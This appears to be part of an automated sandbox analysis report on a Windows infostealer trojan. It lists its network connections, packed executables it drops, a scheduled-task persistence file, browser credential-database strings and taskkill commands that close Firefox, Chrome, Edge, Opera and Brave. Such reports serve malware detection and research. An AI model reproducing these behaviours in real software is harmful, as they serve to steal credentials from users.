Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/accountDOM_VK_OPEN_CURLY_BRACKETincrementModificationCountfocusFirstNavigableEle
Source: firefox.exe, 0000001B.00000002.3120468368.000002550AA73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com_
Source: unknown Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50091 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown Network traffic detected: HTTP traffic on port 50088 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 50100 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50097
Source: unknown Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50087 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50086 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50063 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown Network traffic detected: HTTP traffic on port 50092 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50097 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50030 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown Network traffic detected: HTTP traffic on port 50069 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50101 -> 443
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49979 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49989 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49994 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49997 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:50000 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:50002 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:50004 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:50013 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:50014 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:50018 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50028 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50031 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50059 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50060 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50065 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:50074 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50092 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50093 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50097 version: TLS 1.2

System Summary
barindex
Binary is likely a compiled AutoIt script file
Source: 29af563a7b.exe, 0000000D.00000002.2894102744.0000000000D92000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_f2a40437-4
Source: 29af563a7b.exe, 0000000D.00000002.2894102744.0000000000D92000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_4449ce07-8
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe.0.dr Static PE information: section name:
Source: A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe.0.dr Static PE information: section name: .idata
Source: 0BSU3F1DFM4GF1Y0TBRRGTML6V.exe.0.dr Static PE information: section name:
Source: 0BSU3F1DFM4GF1Y0TBRRGTML6V.exe.0.dr Static PE information: section name: .idata
Source: 0BSU3F1DFM4GF1Y0TBRRGTML6V.exe.0.dr Static PE information: section name:
Source: RLX7QEJ1ATLQN8ECDIPHB.exe.0.dr Static PE information: section name:
Source: RLX7QEJ1ATLQN8ECDIPHB.exe.0.dr Static PE information: section name: .rsrc
Source: RLX7QEJ1ATLQN8ECDIPHB.exe.0.dr Static PE information: section name: .idata
Source: RLX7QEJ1ATLQN8ECDIPHB.exe.0.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name: .rsrc
Source: random[1].exe.10.dr Static PE information: section name: .idata
Source: 09d417a7c4.exe.10.dr Static PE information: section name:
Source: 09d417a7c4.exe.10.dr Static PE information: section name: .rsrc
Source: 09d417a7c4.exe.10.dr Static PE information: section name: .idata
Source: random[1].exe0.10.dr Static PE information: section name:
Source: random[1].exe0.10.dr Static PE information: section name: .rsrc
Source: random[1].exe0.10.dr Static PE information: section name: .idata
Source: random[1].exe0.10.dr Static PE information: section name:
Source: 353ab0ae6e.exe.10.dr Static PE information: section name:
Source: 353ab0ae6e.exe.10.dr Static PE information: section name: .rsrc
Source: 353ab0ae6e.exe.10.dr Static PE information: section name: .idata
Source: 353ab0ae6e.exe.10.dr Static PE information: section name:
Source: RETV5V6Q4X285DV6.exe.11.dr Static PE information: section name:
Source: RETV5V6Q4X285DV6.exe.11.dr Static PE information: section name: .idata
Source: RETV5V6Q4X285DV6.exe.11.dr Static PE information: section name:
Source: SOZIL3CYM3GR68KV3Z4.exe.11.dr Static PE information: section name:
Source: SOZIL3CYM3GR68KV3Z4.exe.11.dr Static PE information: section name: .rsrc
Source: SOZIL3CYM3GR68KV3Z4.exe.11.dr Static PE information: section name: .idata
Source: SOZIL3CYM3GR68KV3Z4.exe.11.dr Static PE information: section name:
Source: GKAQCOVK40X0NN7A.exe.11.dr Static PE information: section name:
Source: GKAQCOVK40X0NN7A.exe.11.dr Static PE information: section name: .idata
PE file has a writeable .text section
Source: num[1].exe.10.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: num.exe.10.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D25DE1 0_3_00D25DE1
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D25DE1 0_3_00D25DE1
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D25DE1 0_3_00D25DE1
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D25DE1 0_3_00D25DE1
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D25DE1 0_3_00D25DE1
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D25DE1 0_3_00D25DE1
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D25DE1 0_3_00D25DE1
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D25DE1 0_3_00D25DE1
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D25DE1 0_3_00D25DE1
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Code function: 7_2_00DF28F8 7_2_00DF28F8
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Code function: 7_2_00DF28E7 7_2_00DF28E7
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe 27E4A3627D7DF2B22189DD4BEBC559AE1986D49A8F4E35980B428FADB66CF23D
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9991555796204621
Source: 0BSU3F1DFM4GF1Y0TBRRGTML6V.exe.0.dr Static PE information: Section: ZLIB complexity 0.9983502213896458
Source: 0BSU3F1DFM4GF1Y0TBRRGTML6V.exe.0.dr Static PE information: Section: dpbwynir ZLIB complexity 0.9945414141040805
Source: RLX7QEJ1ATLQN8ECDIPHB.exe.0.dr Static PE information: Section: ffngccge ZLIB complexity 0.9948113118587809
Source: skotes.exe.3.dr Static PE information: Section: ZLIB complexity 0.9983502213896458
Source: skotes.exe.3.dr Static PE information: Section: dpbwynir ZLIB complexity 0.9945414141040805
Source: random[1].exe.10.dr Static PE information: Section: ZLIB complexity 0.9991555796204621
Source: 09d417a7c4.exe.10.dr Static PE information: Section: ZLIB complexity 0.9991555796204621
Source: random[1].exe0.10.dr Static PE information: Section: ffngccge ZLIB complexity 0.9948113118587809
Source: 353ab0ae6e.exe.10.dr Static PE information: Section: ffngccge ZLIB complexity 0.9948113118587809
Source: RETV5V6Q4X285DV6.exe.11.dr Static PE information: Section: ZLIB complexity 0.9983502213896458
Source: RETV5V6Q4X285DV6.exe.11.dr Static PE information: Section: dpbwynir ZLIB complexity 0.9945414141040805
Source: SOZIL3CYM3GR68KV3Z4.exe.11.dr Static PE information: Section: ffngccge ZLIB complexity 0.9948113118587809
Source: random[1].exe0.10.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: RLX7QEJ1ATLQN8ECDIPHB.exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 353ab0ae6e.exe.10.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: SOZIL3CYM3GR68KV3Z4.exe.11.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: RLX7QEJ1ATLQN8ECDIPHB.exe, 00000005.00000003.2316405109.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, RLX7QEJ1ATLQN8ECDIPHB.exe, 00000005.00000002.2356707937.00000000000D1000.00000040.00000001.01000000.0000000A.sdmp, 353ab0ae6e.exe, 0000000C.00000003.2785659167.0000000005500000.00000004.00001000.00020000.00000000.sdmp, 353ab0ae6e.exe, 0000000C.00000002.2826208289.0000000000F61000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@75/29@80/12
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\HG7APAF5.htm Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6800:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3376:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1480:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:728:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3176:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6000:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2620:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4720:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5892:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe, 00000000.00000003.2140970539.0000000005757000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141362319.000000000573A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154444042.0000000005764000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154546902.0000000005757000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2787926502.0000000005D56000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2787272196.0000000005D75000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2801563364.0000000005D79000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 44%
Source: file.exe String found in binary or memory: p.update.lastUpdateTime.recipe-client-addon-run", 1696426836); user_pref("app.update.lastUpdateTime.region-update-timer", 0); user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837); user_pref("app.update.lastUpdateTime.xpi-signature-v
Source: 0BSU3F1DFM4GF1Y0TBRRGTML6V.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: RLX7QEJ1ATLQN8ECDIPHB.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe "C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe"
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe "C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe "C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe "C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe "C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe "C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe"
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe "C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe"
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
